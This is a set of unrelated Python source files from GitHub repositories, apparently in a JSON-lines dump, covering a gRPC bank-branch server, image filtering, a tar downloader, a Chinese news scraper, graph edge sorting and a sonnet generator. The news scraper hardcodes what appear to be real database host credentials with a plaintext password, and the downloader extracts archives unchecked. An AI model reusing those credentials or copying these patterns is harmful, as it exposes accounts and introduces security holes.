json\nimport grpc\nimport time\nimport multiprocessing\nimport shutil\n\nclass Branch(example_pb2_grpc.RPCServicer):\n\n def __init__(self, id, balance, branches):\n # unique ID of the Branch\n self.id = id\n # replica of the Branch's balance\n self.balance = balance\n # the list of process IDs of the branches\n self.branches = branches\n # the list of id of other branches\n self.others = self.branches\n self.others.pop((self.id-1))\n # A list to carry the message recieved from Customer\n self.events = list()\n # customer id\n self.cust = 0\n # Writeset for enforcing client-centric consistency\n self.writeset = 0\n\n\n\n\n # This method accepts the request from Customer and generates what has to be added to the existing balance.\n # The variable known as self.money carries this amount that will be added to the balance.\n # If the request is a deposit, then self.money is assigned the money amount to be deposited.\n # If the request is a withrawal, self.money is assigned a negative value of the money amounth to be withdrawn.\n # Else self.money is assigned 0. \n # Note that for easy of implementaion, query is regarded also as a deposit of $0\n def eventRequestExecute (self, x):\n self.events = (ast.literal_eval(x))\n self.cust = int(self.events[0])\n if self.events[1][\"interface\"] == 'withdraw':\n self.money = 0 - int(self.events[1][\"money\"]) \n elif self.events[1][\"interface\"] == 'deposit':\n self.money = int(self.events[1][\"money\"])\n else:\n self.money = 0\n self.writeset = self.events[2]\n self.workingWriteset = self.events[2]\n\n\n\n # This method handles the events in a branch that recieves a propagated message\n # The propagated message is the amount carried by variable self.money from the propagating branch as well as the writeset of \n # This variable is the amount which could be positive (deposit) or negative (withdrawal) is added to the balance of the receiving branch\n # Also the writeset is increased by 1 to allow the relevant branch execute writset based event.\n # This result in a propagation of writes and writesets \n def ClockUpdate(self, request, context):\n rcast = ast.literal_eval(request.propout)\n self.balance += int(rcast[0])\n self.writeset = int(rcast[1]) + 1\n return example_pb2.ExamplePropIn(propin=str(\"done\"))\n \n\n # This method handles the propagation of self.money (amount to be deposited or withdrawn) to other branches aside self. \n # The propagating Branch send a message, awaits for the other Branches to recieve the messages and acknowledge reciept.\n # Then it updates it's own branch's balance.\n def propagateRequest(self):\n for x in self.others:\n sendit = str([self.money, self.writeset])\n trans_spec = 50047 + x\n clockit = sendit\n with grpc.insecure_channel('localhost:' + str(trans_spec)) as channel:\n stub = example_pb2_grpc.RPCStub(channel)\n response = stub.ClockUpdate(example_pb2.ExamplePropOut(propout=clockit))\n self.writeset += 1\n self.balance += self.money\n \n \n\n # This method puts it all together. It ensures that request from the client is appropriately executed \n # the right message returned back to the Customer\n # This method also enforces client centric consistencies using the writeset, while lool and time.sleep\n # If the writeset and the incoming message writeset from the customer is not the same, the branch waits for 0.1 seconds and check again. \n # Once the message writeset is same with the branch writeset, the execution will now proceed. In essence the first writeset to be excuted and propagated is 0. \n # Other event of the same process will wait until the increment is made to 1 and then writeset 1 can be able to execute. \n # This continues until executions are done.\n def MsgDelivery(self,request, context):\n checkevent = (ast.literal_eval(request.inmessage))\n while int(checkevent[2]) != int(self.writeset):\n time.sleep(0.1)\n response = example_pb2.ExampleReply()\n self.eventRequestExecute(request.inmessage)\n self.propagateRequest()\n response.outmessage = str([{\"id\": self.cust, \"balance\": self.balance, \"writeset\": self.workingWriteset}])\n return response\n\n# This function ensures the servers are actively listening to the appropriate ports.\ndef creatServer(id, balance, branches):\n server = grpc.server(futures.ThreadPoolExecutor(max_workers=10))\n example_pb2_grpc.add_RPCServicer_to_server(Branch(id, balance, branches), server)\n trans_spec = 50047 + int(id)\n server.add_insecure_port('[::]:'+ str(trans_spec))\n server.start()\n server.wait_for_termination()\n\n\n\nif __name__ == \"__main__\":\n lock = multiprocessing.Lock()\n # Reading of input file\n with open(\"input.json\") as example_file:\n example_data = json.load(example_file)\n branches = []\n for i in range(len(example_data)):\n if example_data[i]['type'] == 'bank':\n branches.append(int(example_data[i]['id']))\n # this ensures multiprocessing is executed.\n processes = []\n for i in range(len(example_data)):\n if example_data[i]['type'] == 'bank':\n p1 = multiprocessing.Process(target=creatServer, args=(int(example_data[i]['id']), int(example_data[i]['balance']), branches))\n processes.append(p1)\n p1.start()\n for p1 in processes:\n p1.join()","repo_name":"ohuajo/Client-Centric-Consistency","sub_path":"Branch.py","file_name":"Branch.py","file_ext":"py","file_size_in_byte":5787,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"14182305541","text":"import matplotlib.pyplot as plt\nimport numpy as np\nimport cv2 as cv\nimport sys\n\n# a) Read Image, 5x5 Box Filter, Plot\ndef a():\n an_image = plt.imread('C:/Users/pk/Dropbox/Master/MMI/2. Semester/Bildverarbeitung/Aufgaben/2/test2.jpg');\n filtered = cv.filter2D(an_image, -1, np.ones((5,5))*1/25)\n plt.subplot(1,2,1)\n plt.imshow(an_image)\n plt.subplot(1,2,2)\n plt.imshow(filtered)\n plt.show()\n\n\n# b) \ndef b(centerIncrease):\n an_image = plt.imread('C:/Users/pk/Dropbox/Master/MMI/2. Semester/Bildverarbeitung/Aufgaben/2/test2.jpg');\n boxfilter = np.ones((5,5));\n boxfilter[2,2] = boxfilter[2,2]+centerIncrease;\n totalMax = 1/(25+centerIncrease);\n filtered = cv.filter2D(an_image, -1, boxfilter*totalMax)\n plt.subplot(1,2,1)\n plt.imshow(an_image)\n plt.subplot(1,2,2)\n plt.imshow(filtered)\n plt.show()\n\ndef main():\n b(0)\n #a()\n\n# function for turning picture into grey scale\ndef toGrey(image):\n return cv.cvtColor(image, cv.COLOR_BGR2GRAY)\n\n\nif __name__ == \"__main__\":\n sys.exit(main())","repo_name":"scorixear/bildverarbeitung","sub_path":"2/1.py","file_name":"1.py","file_ext":"py","file_size_in_byte":1001,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"71125273123","text":"LOGLEVEL= {\n 'disable' : 0,\n 'fatal' : 1,\n 'error' : 2,\n 'warning' : 3,\n 'info' : 4,\n 'debug' : 5,\n 'trace' : 6,\n}\n\nVCS_DIRS = ['CVS', '.svn', '.hg']\n\nLIBNAME_SEP = \"_\"\n\nBIN_PATH = 'bin'\nLIB_PATH = 'lib'\nRC_PATH = 'rc'\nTEST_PATH = 'test'\n\nCXX_SOURCE_EXT = ['cpp','cxx','c','C']\nCXX_HEADER_EXT = ['hpp','hxx','h','H']\n\nPRJ_OPT_DIR = 'bin'\nOPTS_FILE = 'build.options'\n\nSYSTEM_DEFAULT_TOOL = {\n \"linux\" : \"g++\" ,\n \"darwin\" : \"g++\" ,\n \"windows\" : \"msvc\",\n }\n\nWINDOWS = 'win'\nLINUX = 'nux'\nMACOSX = 'osx'\n\nSYSTEMS_RACY_NAMES = { \n 'linux' : LINUX,\n 'darwin' : MACOSX,\n 'windows' : WINDOWS,\n }\n","repo_name":"cfobel/sconspiracy","sub_path":"Python/racy/renv/constants.py","file_name":"constants.py","file_ext":"py","file_size_in_byte":703,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"71401334563","text":"#!/usr/bin/python3\n\nimport tarfile\nimport json\nimport os\nimport shutil\nimport requests\nfrom requests.exceptions import HTTPError\n\nclass DownloadMaster(object):\n '''\n DownloadMaster - класс для управления контентом (загрузка, распаковка, удаление, состояние)\n При инициализации объекта необходимо подать уникальный его уникитальный номер в виде строки\n '''\n def __init__(self, id_arh: str, chunk_size = 1024) -> None:\n self.chunk_size = chunk_size\n self.id = id_arh\n self.status_list = ['downloading', 'unpacking', 'ok', 'deleting', 'unknown']\n self.status = self.status_list[-1]\n\n def download(self, url: str) -> None:\n \"\"\"\n download - функция загрузки архива\n На вход получает url-адрес и загружает архив\n При неудаче в знании статуса возращает строку с ошибкой\n \"\"\"\n self.url = url\n self.file_name = self.id+'.tar.gz'\n self.download_pe_cent = 0\n try:\n response = requests.get(self.url, stream=True)\n response.raise_for_status()\n if response.status_code == 200:\n if response.headers['Content-Type'] == 'application/octet-stream':\n Content_Length = int(response.headers['Content-Length'])\n with open(self.file_name, 'wb') as f:\n for i, chunk in enumerate(response.iter_content(chunk_size=self.chunk_size)):\n if chunk:\n f.write(chunk)\n self.status = self.status_list[0]\n self.download_pe_cent = int(i*self.chunk_size / Content_Length *100)\n except HTTPError as http_err:\n self.status = f'HTTP error occurred: {http_err}'\n except Exception as err:\n self.status = f'Other error occurred: {err}'\n else:\n self.extract()\n self.status = self.status_list[2]\n\n def extract(self) -> None:\n '''\n extract - функция извлечения данных из архива\n '''\n with tarfile.open(self.file_name) as tar:\n self.status = self.status_list[1]\n self.files = tar.getnames()\n tar.extractall(path=self.id)\n\n def delete_arh(self) -> None:\n '''\n delete_arh - функция удаления архива и распакованных файлов\n '''\n self.status = self.status_list[3]\n os.remove(os.path.join(os.getcwd(), self.file_name))\n arh_unpack_dir = os.path.join(os.getcwd(), self.id)\n shutil.rmtree(arh_unpack_dir)\n\n def get_status(self) -> str:\n '''\n get_status - функция получения текущего состояния контента\n '''\n status = {'id':self.id}\n if self.status == self.status_list[0]:\n status['status'] = self.status\n status['progress'] = self.download_pe_cent\n elif self.status == self.status_list[2]:\n status['status'] = self.status\n status['files'] = self.files\n else:\n status['status'] = self.status\n return json.dumps(status)\n\n\nif __name__ == '__main__':\n # Тестирование работы\n url ='http://download.ispsystem.com/OSTemplate/new/latest/Debian-7-i386-5.57-20170910000.tar.gz'\n dm = DownloadMaster('20170910000')\n dm.download(url)\n dm.delete_arh()\n","repo_name":"Che3108/test_ispsystem","sub_path":"download.py","file_name":"download.py","file_ext":"py","file_size_in_byte":3717,"program_lang":"python","lang":"ru","doc_type":"code","stars":3,"dataset":"github-code","pt":"54"} +{"seq_id":"16785975245","text":"from unittest import TestCase\n\nimport json\n\n\nclass TestPSLJson(TestCase):\n def test_to_json(self):\n # complex types need a to_json method\n json_dict = json.dumps({'field_1': 'value_1',\n 'field_2': 'value_2'})\n assert 'value_1' in json_dict\n assert 'value_2' in json_dict\n","repo_name":"DEV3L/python-json-serialization-examples","sub_path":"python_json_serialization_examples/tests/unit/test_psl_json.py","file_name":"test_psl_json.py","file_ext":"py","file_size_in_byte":333,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"54"} +{"seq_id":"70249769441","text":"import mysql.connector\nimport requests\nimport time\nimport datetime\nimport random\nfrom bs4 import BeautifulSoup\nimport module_news_comTag\nimport module_news_govTag\nimport module_news_topicTag\nimport module_logWriter as lw\n\n\ndef minorRandomPause():\n randomTime = random.randint(600, 900)\n lw.log_writer('东方财富脚本进入休眠' + str(randomTime) + '秒')\n time.sleep(randomTime)\n\ndef connectDB():\n mydb = mysql.connector.connect(host='rm-bp11g1acc24v9f69t1o.mysql.rds.aliyuncs.com',\n user='rayshi',\n password='Rayshi1994!',\n database='ttd',\n auth_plugin='mysql_native_password')\n\n \n print('DB is connected')\n print()\n return mydb\n\ndef parsingContent(link):\n t = time.localtime()\n news_date = str(t.tm_year) + '-' + str(t.tm_mon) + '-' + str(t.tm_mday) + '-' + str(t.tm_hour) + '-' + str(t.tm_min)\n title = ''\n content = ''\n\n fullLink = 'http://fund.eastmoney.com/a/' + link\n try:\n p = requests.get(fullLink)\n s = BeautifulSoup(p.content, features = 'html.parser')\n except:\n lw.log_writer('东方财富脚本爬取' + fullLink + '失败')\n return {'news_link': fullLink.strip(), 'news_title': title.strip(), 'news_source': '东方财富基金资讯', 'news_content': content.strip(), 'news_date': news_date}\n\n lw.log_writer('东方财富脚本开始爬取' + fullLink)\n\n\n\n try: # 爬取标题\n title = s.find('h1').text.replace('\\n', '')\n except:\n lw.log_writer('东方财富脚本爬取标题错误')\n\n try:\n contentList = s.findAll('div', {'id': 'ContentBody'})[0].findAll('p')\n for p in contentList:\n if len(p.text) > 5 and p.find('img') is None:\n content += '

' + p.text.replace('\\n', '') + '

'\n else:\n pass\n except:\n lw.log_writer('东方财富脚本爬取内容错误')\n\n\n\n rst = {'news_link': fullLink.strip(), 'news_title': title.strip(), 'news_source': '东方财富基金资讯',\n 'news_content': content.strip(), 'news_date': news_date}\n\n return rst\n\ndef main():\n print('天天基金网新闻')\n print()\n\n # ============= 测试Connection =============\n mydb = connectDB()\n mycursor = mydb.cursor()\n mycursor.execute('SELECT * FROM ttd.news LIMIT 10;')\n print(len(mycursor.fetchall()), ' Connection works')\n print()\n # ============= 测试Connection END =============\n\n r = requests.get('http://fund.eastmoney.com/a/cjjyw.html')\n soup = BeautifulSoup(r.content, features = 'html.parser')\n\n # ============== 主页面爬取 ==============\n main_list = soup.find('div', {'class': 'mainCont'}).findAll('ul') # 此处包含页面4个ul\n main_page_item = {} # 用于储存全部该页面的数据\n \n for i in main_list:\n currentUl = i.findAll('a')\n for a in currentUl:\n main_page_item[a.text] = a.get('href')\n\n print('共', len(main_page_item), '个结果')\n print()\n # ============== 主页面爬取 END ==============\n\n # ============== 数据库对照 =================\n confirmed_new = []\n for a in main_page_item:\n try:\n sql = 'SELECT news_id, news_title FROM ttd.news WHERE news_title=\\'' + str(a) + '\\';'\n mycursor.execute(sql)\n compareResult = mycursor.fetchall()\n if len(compareResult) == 0:\n confirmed_new.append(main_page_item[a])\n else:\n pass\n except:\n lw.log_writer('东方财富脚本首页添加新闻错误')\n pass\n\n lw.log_writer('东方财富脚本本轮新增新闻有' + str(len(confirmed_new)) + '条')\n # ============== 数据库对照 END =================\n\n # ============== 爬取主代码 =================\n if len(confirmed_new) == 0:\n print('没有发现新增新闻,即将关闭DB链接')\n print()\n mydb.close()\n else:\n for link in confirmed_new:\n sql = 'INSERT INTO ttd.news (news_title, news_source, news_date, news_content, news_link, gov_tag, com_tag, topic_tag) VALUES (%s, %s, %s, %s, %s, %s, %s, %s)'\n rst = parsingContent(link)\n # ======= 标签 - 新增 12.15 ==========\n gov_tag = module_news_govTag.tagGov(mycursor, str(rst['news_title']), str(rst['news_content']))\n com_tag = module_news_comTag.tagCom(mycursor, str(rst['news_title']), str(rst['news_content']))\n topic_tag = module_news_topicTag.tagTopic(mycursor, str(rst['news_title']), str(rst['news_content']))\n # ======= 标签 - 新增 12.15 END ==========\n val = (str(rst['news_title']), str(rst['news_source']), str(rst['news_date']), str(rst['news_content']), str(rst['news_link']), gov_tag, com_tag, topic_tag)\n try:\n mycursor.execute(sql, val)\n mydb.commit()\n except:\n lw.log_writer('东方财富脚本在添加数据时失败')\n lw.log_writer('东方财富脚本新增' + str(mycursor.rowcount) + '条')\n minorRandomPause()\n \n lw.log_writer('东方财富脚本轮结束')\n mydb.close()\n # ============== 爬取主代码 END =================\n \n\nif __name__ == \"__main__\":\n main()","repo_name":"JeTurkey/cloud-parser","sub_path":"sourceCode/parser_eastFund.py","file_name":"parser_eastFund.py","file_ext":"py","file_size_in_byte":5377,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"54"} +{"seq_id":"71220304802","text":"def convert_decimal(n, base):\n if n == 0:\n return '0'\n digits = '0123456789ABCDEF'\n remainders = []\n negative = False\n if n < 0:\n negative = True\n n = -1 * n\n while n != 0:\n r = n % base\n n = n // base\n remainders.append(r)\n # print(r, n, remainders)\n ans = ''.join(digits[r] for r in reversed(remainders))\n if negative:\n ans = '-' + ans\n return ans\n\n\ndef convert_to_decimal(n, base):\n if n == 0:\n return 0\n digits = {'0': 0, '1': 1, '2': 2, '3': 3, '4': 4, '5': 5, '6': 6, '7': 7, '8': 8, '9': 9, 'A': 10, 'B': 11, 'C': 12, 'D': 13, 'E': 14, 'F': 15}\n ans = 0\n power = 0\n while n:\n ans = ans + digits[n[-1]] * (base ** power)\n n = n[:-1]\n power += 1\n return ans\n\n\nif __name__ == '__main__':\n assert convert_decimal(10, 2) == '1010', '1010'\n assert convert_decimal(10, 16) == 'A', 'A'\n assert convert_decimal(10, 10) == '10', '10'\n\n assert convert_to_decimal('1010', 2) == 10, '10'\n assert convert_to_decimal('ABCDE', 16) == 703710, '703710'\n assert convert_to_decimal('ABCDE', 15) == 546284, '546284'\n","repo_name":"avshirod/codes","sub_path":"convert_decimal_to_base.py","file_name":"convert_decimal_to_base.py","file_ext":"py","file_size_in_byte":1149,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"34571257314","text":"import itertools as it\nimport copy\n\n\ndef unlist(nested_list):\n return list(it.chain.from_iterable(nested_list))\n\n\ndef get_valid_starting_vertex(edges: [(int, int)], starting_vertex: int = None) -> int:\n \"\"\"\n A function to either obtain a valid starting vertex from a list of edges, or ensure the provided starting vertex is\n indeed a valid choice, i.e. that the provided list of edges is either a cycle of edges or a sequence with two\n defined end-points\n :param edges: a list of (unsorted) edges as tuples to be sorted\n :param starting_vertex: an optional single integer vertex at which to start the sorting\n :return: the integer identifier of the starting vertex\n \"\"\"\n\n # Extract a list of vertices from the list of edges\n vertices = unlist(edges)\n\n # If a starting vertex is provided, ensure it actually exists in the vertex list\n if starting_vertex is not None:\n assert starting_vertex in vertices, \\\n f\"Providing starting vertex {starting_vertex} is not in edge's vertex set {vertices}.\"\n\n # Count the number of occurences of each vertex in the list of vertices\n vertex_counts = {vertex: 0 for vertex in list(set(vertices))}\n for vertex in vertices:\n vertex_counts[vertex] += 1\n\n # Count the number of \"knots\" and \"forks\" in the edge sequence\n forks = [node for node, count in vertex_counts.items() if count > 2]\n assert len(forks) == 0, \\\n f\"Edge Sequence has no unique order, as nodes {forks} are featured more than twice.\"\n\n # Count the number of ends in the sequence is only 2, or all vertices must appear exactly twice\n ends = [node for node, count in vertex_counts.items() if count == 1]\n cycles = [node for node, count in vertex_counts.items() if count == 2]\n assert (len(ends) == 2) or (len(cycles) == len(vertex_counts)), \\\n f\"Edge sequence has too many or too few end vertices, as nodes {ends} all only appear once, or the number\" \\\n f\"of double matched vertices, {len(cycles)} is not the length of the available nodes {len(vertex_counts)}\"\n\n # If the starting vertex is provided, ensure that it corresponds to end point vertex\n if (starting_vertex is not None) and (len(ends) > 0):\n assert starting_vertex in ends, \\\n f\"Provided starting vertex {starting_vertex} not a valid selection from end points {ends}.\"\n\n # Return a starting vertex if it was provided and is legal\n if starting_vertex is not None:\n return starting_vertex\n\n # If a legal sequence of edges was provided, return one of its end-points\n elif len(ends) > 0:\n return ends[0]\n\n # If a legal cycle was provided, return an (effectively) random vertex\n else:\n return vertices[0]\n\n\ndef get_first_edge(edges: [(int, int)], starting_vertex: int) -> (int, int):\n \"\"\"\n A function which returns an edge which features the provided starting vertex in its first position\n :param edges: a list of (unsorted) edges as tuples to be sorted\n :param starting_vertex: an optional single integer vertex at which to start the sorting\n :return: a sorted list of edges\n \"\"\"\n\n # Iterate over all edges in set\n for edge in edges:\n\n # Check whether first vertex of edge is the starting vertex\n if edge[0] == starting_vertex:\n return edge\n\n # Check whether second vertex of edge is the starting vertex\n elif edge[1] == starting_vertex:\n return edge[1], edge[0]\n\n # Provided starting vertex Mapped to no edge\n assert True, f\"Starting Vertex {starting_vertex} mapped to no edge {edges}\"\n\n\ndef get_ordered_edges(edges, starting_vertex: int = None) -> [(int, int)]:\n \"\"\"\n A function to sort a list of edges provided as tuples, such that the second vertex of an edge corresponds to the\n first vertex of the next edge, i.e. (a, c) (c, b) (b, a)\n :param edges: a list of (unsorted) edges as tuples to be sorted\n :param starting_vertex: an optional single integer vertex at which to start the sorting\n :return: a sorted list of edges\n \"\"\"\n\n # Convert input edges to tuples to accommodate set types\n edges = [edge if type(edge) is tuple else tuple(edge) for edge in edges]\n print(f\"edges: {edges}\")\n # Get a valid starting vertex / Ensure the provided one is valid\n starting_vertex = get_valid_starting_vertex(edges, starting_vertex)\n\n # Convert list of tuples to list of frozen-sets\n remaining_edges = [frozenset(edge) for edge in edges]\n\n # Obtain an edge which features the starting vertex\n first_edge = get_first_edge(edges, starting_vertex)\n\n # Initialize the list of sorted edges, and remove first one from the remaining set\n sorted_edges = [first_edge] + [(None, None)] * (len(edges) - 1)\n remaining_edges.remove(frozenset(first_edge))\n\n # Iterate over each remaining index to be sorted\n for i in range(1, len(sorted_edges)):\n\n # Iterate over all remaining edges to be included\n for edge_set in remaining_edges:\n\n # Convert Set Edge to forward and 'reversed' edge\n f_edge = tuple(edge_set)\n r_edge = f_edge[::-1]\n\n # Check whether the forward facing edge matches the last sorted edge\n if f_edge[0] == sorted_edges[i - 1][1]:\n sorted_edges[i] = f_edge\n remaining_edges.remove(frozenset(f_edge))\n break\n\n # Check whether the 'reversed' facing edge matches the last sorted edge\n elif r_edge[0] == sorted_edges[i - 1][1]:\n sorted_edges[i] = r_edge\n remaining_edges.remove(frozenset(r_edge))\n break\n\n # Ensure no edges remain to be sorted\n assert len(remaining_edges) == 0, \\\n f\"Not all edges sorted. These remain: {sorted_edges}\"\n\n # Return sorted edges as list of tuples\n return sorted_edges\n\n\ndef get_vertex_sequence(edges, starting_vertex=None, is_ordered=False):\n\n # If the edges are ordered, they may not need to be sorted\n if is_ordered:\n\n # If no starting vertex is provided, the ordered edges can be taken as is\n if starting_vertex is None:\n ordered_edges = copy.deepcopy(edges)\n\n # If a starting vertex is provided, ensure it corresponds to the first vertex of the edges\n else:\n\n # If it does, the ordered edges can be utilized as is\n if edges[0][0] == starting_vertex:\n ordered_edges = copy.deepcopy(edges)\n\n # If not, re-sort the provided edges with the provided starting vertex\n else:\n ordered_edges = get_ordered_edges(edges=edges, starting_vertex=starting_vertex)\n\n # If the provided edges are not sorted, sort them using the provided starting vertex\n else:\n ordered_edges = get_ordered_edges(edges=edges, starting_vertex=starting_vertex)\n\n # Extract the vertex sequence consisting of the first vertex of each edge\n vertex_sequence = [edge[0] for edge in ordered_edges]\n print(f\"sorted vertex sequence: {vertex_sequence}\")\n\n # If the edge list is not cyclical, it must be a sequence, so append the final vertex as well\n if ordered_edges[0][0] != ordered_edges[-1][1]:\n vertex_sequence.append(ordered_edges[-1][1])\n print(f\"sorted vertex sequence post append: {vertex_sequence}\")\n\n # Return the ordered vertex sequence\n return vertex_sequence\n\n\ndef get_face_vertex_sequence(face, graph):\n # todo: does not work if edges exist between elements of the face other than the minimal cycle\n #face_edges = [None] * len(face)\n face_edges = []\n # print(f\"face: {face}\")\n for edge in graph.edges:\n # print(f\"edge: {edge}\")\n common_vertices = face.intersection(set(edge))\n if len(common_vertices) == 2: # TODO: this does not always produce the edge sequence if there is a triangle\n face_edges.append(edge)\n # print(f\"face edges: {face_edges}\")\n sorted_face_edges = sort_face_edges(face_edges)\n return sorted_face_edges\n\n\ndef sort_face_edges(edge_list):\n\n # TODO: reformulate search in terms of indeces that can be 'blacked' out because there were already included\n\n # Convert set of frozensets to list of tuples\n # TODO: make this check more robust\n edge_list = [tuple(edge) for edge in edge_list] if isinstance(edge_list, set) else edge_list\n\n # Initialize new list of sorted edges in a cycle\n new_list = [(None, None)] * len(edge_list)\n new_list[0] = edge_list[0]\n\n # Iterate over all indices to be filled\n for index in range(1, len(edge_list)):\n\n # Specify the next target value as the last vertex of the first edge\n target_value = new_list[index-1][1]\n\n # Find the next possible edge which matches the last edge's second vertex and has not yet been included\n next_element = [element for element in edge_list if (target_value in element) and\n (element not in new_list) and ((element[1], element[0]) not in new_list)][0]\n\n # Store either the original edge or its reverse depending on which allows for the cycle to continue\n reverse_edge = (next_element[1], next_element[0])\n new_list[index] = reverse_edge if reverse_edge[0] == target_value else next_element\n\n # Ensure that the found order is indeed cyclical\n assert new_list[0][0] == new_list[-1][1], \\\n \"Found sorted order of edges is not cyclical.\"\n\n # Return the sorted cycle\n return new_list\n\n\ndef get_sorted_face_vertices(edges, is_sorted=False):\n if not is_sorted:\n if not all(edges[index][1] == edges[(index + 1) % len(edges)] for index in range(0, len(edges))):\n edges = sort_face_edges(edges)\n return [edge[0] for edge in edges]\n","repo_name":"henry-ehlers/Edge-Crossing-Resolution-through-Vertex-Duplication","sub_path":"src/edges.py","file_name":"edges.py","file_ext":"py","file_size_in_byte":9730,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"17713527651","text":"# 78. Subsets\n# Given a set of distinct integers, nums, return all possible subsets (the power set).\n\n# Note: The solution set must not contain duplicate subsets.\n\n\nfrom typing import List\n\ndef subsets(nums: List[int]) -> List[List[int]]:\n \n ret = [[]]\n \n for n in nums:\n ret += [r+[n] for r in ret]\n \n return (ret)\n \n### Complexity is O(N*2^N)\n\ndef subsets_bitmask(nums: List[int]) -> List[List[int]]:\n \n ret = []\n \n n = len(nums)\n \n for s in range(1 >> n): ## 2**n == 1 >> n\n l = []\n \n ## s in binary number will be of length n where i-th place is 1 if we have to include that nums[i] \n mask = 1\n for i in range(n):\n if s & mask: l.append(nums[i])\n mask <<= 1\n ret.append(l)\n \n return (ret)\n \nif __name__ ==\"__main__\":\n import timeit\n a = timeit.timeit('subsets([1,2,3,4])', globals=globals(), number=100)\n b = timeit.timeit('subsets_bitmask([1,2,3,4])', globals=globals(), number=100)\n print(a,b)","repo_name":"rajkar86/python_coding_interviews","sub_path":"leetcode/0078_subsets.py","file_name":"0078_subsets.py","file_ext":"py","file_size_in_byte":950,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"42697846839","text":"# /usr/bin/env python3\n\nfrom collections import defaultdict\nimport random\nimport json\nimport os\nimport pandas as pd\n\n\ndef read_source(filename_syls):\n with open(filename_syls+\".csv\", \"r\") as data_file:\n text_syls = data_file.readlines()\n\n return text_syls\n\n\ndef final_syls_to_array(text):\n final_syls = []\n for line in text:\n # Quitar salto de linea\n tmp = len(line)\n tmp -= 1\n final_syls.append(line[:tmp])\n\n return final_syls\n\n\ndef final_syls_counter(dict_verses):\n\n counter_final_syls = {}\n\n for syl in dict_verses:\n counter_final_syls[syl] = len(dict_verses[syl])\n\n return counter_final_syls\n\n\ndef verses_by_final_syls(filename_verses, final_syls):\n\n text_verses = pd.read_csv(filename_verses+\".csv\")\n dict_verses = defaultdict(list)\n dict_verses_filter = {}\n\n i = 0\n for syl in final_syls[1:]:\n\n if syl in dict_verses.keys():\n dict_verses[syl].append(text_verses.iloc[i].verse)\n else:\n dict_verses[syl].append(text_verses.iloc[i].verse)\n i += 1\n\n dict_verses_filter = filter_by_num_verses(dict_verses)\n return dict_verses_filter\n\n\ndef filter_by_num_verses(dict_verses):\n\n filter_dict_verses = {}\n for syl in dict_verses:\n if (len(dict_verses[syl]) > 3):\n filter_dict_verses[syl] = dict_verses[syl]\n\n return filter_dict_verses\n\n\n\ndef to_json(name_datafile, name_datastructure):\n\n with open(name_datafile+\".json\", \"w\") as outfile:\n json.dump(name_datastructure, outfile)\n \n return 0\n\n\ndef homologous_final_syls(dict_verses, dict_verses_):\n\n hom_final_syls = []\n for syl in dict_verses:\n\n if ((syl in dict_verses.keys()) and (syl in dict_verses_.keys()) and (syl not in hom_final_syls)):\n hom_final_syls.append(syl)\n\n for syl_ in dict_verses_:\n\n if ((syl_ in dict_verses.keys()) and (syl_ in dict_verses_.keys()) and (syl_ not in hom_final_syls)):\n hom_final_syls.append(syl_)\n\n return hom_final_syls\n\n\ndef to_text(src_dir_cities, id_sonnet, city, sonnet):\n with open(src_dir_cities+\"/\"+city+\"/\"+str(id_sonnet)+\".txt\", \"w\") as sonnet_file:\n sonnet_file.write(sonnet)\n\n return 0\n\n\ndef create_sonnets(dict_verses, dict_verses_city, dict_verses_apoc, city, src_dir_cities):\n\n n_sonnets=3\n for id_sonnet in range(n_sonnets):\n\n\n # Choose de final syllabe to build the sonnets\n hom_final_syls_city = homologous_final_syls(dict_verses, dict_verses_city)\n final_syls_verse_A = random.choice(hom_final_syls_city)\n\n final_syls_verse_B = random.choice(list(dict_verses.keys()))\n\n hom_final_syls_apoc = homologous_final_syls(dict_verses, dict_verses_apoc)\n final_syls_verse_C = random.choice(hom_final_syls_apoc)\n\n final_syls_verse_D = random.choice(list(dict_verses.keys()))\n\n # Core sonnets built\n # falta verificar que no se repitan los versos, si hay solo un verso se repite 3 veces\n verse_A_city = random.choices(list(dict_verses_city[final_syls_verse_A]), k=1)\n verses_A = random.choices(list(dict_verses[final_syls_verse_A]), k=3)\n\n verses_B = random.choices(list(dict_verses[final_syls_verse_B]), k=4)\n\n verses_C = random.choices(list(dict_verses[final_syls_verse_C]), k=2)\n verse_C_apoc = random.choices(list(dict_verses_apoc[final_syls_verse_C]), k=1)\n\n verses_D = random.choices(list(dict_verses[final_syls_verse_D]), k=3)\n\n sonnet = \" \"+verse_A_city[0]+\"\\n\"+verses_B[0]+\"\\n\"+verses_B[1]+\"\\n\"+verses_A[0]+\"\\n\\n\"+verses_A[1]+\"\\n\"+verses_B[2]+\"\\n\"+verses_B[3]+\"\\n\"+verses_A[2]+\"\\n\\n\"+verses_C[0]+\"\\n\"+verses_D[0]+\"\\n\"+verses_C[1]+\"\\n\\n\"+verses_D[1]+\"\\n \"+verse_C_apoc[0]+\"\\n\"+verses_D[2]+\"\\n\"\n\n print (\"\\n\\nXXXXXXXXXXX[\"+city+\"]XXXXXXXXXXXXXXXXX\\n\")\n print (sonnet)\n\n to_text(src_dir_cities, id_sonnet, city, sonnet)\n #counter_city = \"2\"\n #with open(\"verses/\"+city+\"/\"+str(counter_city)+\".txt\", \"w\") as sonnet_file:\n # sonnet_file.write(sonnet)\n\n return sonnet\n\n\ndef main():\n\n #source_name = \"02_terminaciones\"\n\n filename_verses = \"00_versos_predicted\"\n filename_syls = \"01_terminaciones_versos\"\n text_syls = read_source(filename_syls)\n final_syls = final_syls_to_array(text_syls)\n dict_verses = verses_by_final_syls(filename_verses, final_syls)\n counter_syls = final_syls_counter(dict_verses)\n\n filename_verses_apoc = \"00_versos_apocalipsis\"\n filename_syls_apoc = \"01_terminaciones_versos_apocalipsis\"\n text_syls_apoc = read_source(filename_syls_apoc)\n final_syls_apoc = final_syls_to_array(text_syls_apoc)\n dict_verses_apoc = verses_by_final_syls(filename_verses_apoc, final_syls_apoc)\n counter_syls_apoc = 